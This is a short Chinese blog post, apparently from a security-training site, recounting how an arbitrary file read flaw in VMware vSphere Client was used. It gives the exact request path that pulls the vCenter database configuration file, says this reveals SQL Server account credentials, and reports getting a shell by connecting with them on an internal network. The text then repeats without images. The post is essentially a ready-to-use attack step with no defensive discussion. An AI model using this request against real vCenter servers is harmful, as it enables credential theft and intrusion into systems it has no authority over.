前端长这样:
![图片[1]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院](https://file.hackdor.com/webfile/2024/12/20241204101724543.png)
![图片[2]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院](https://file.hackdor.com/webfile/2024/12/20241204101724315.png)
方法如下:
访问连接
1.1.1.1/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
![图片[3]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院](https://file.hackdor.com/webfile/2024/12/20241204101724590.png)
会读取到SQL server账户密码
然后连接
![图片[4]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院](https://file.hackdor.com/webfile/2024/12/20241204101724210.png)
Ge’tshell 成功。前提要在一个内网。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
前端长这样:
方法如下:
访问连接
1.1.1.1/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
会读取到SQL server账户密码
然后连接
Ge’tshell 成功。前提要在一个内网。
暂无评论内容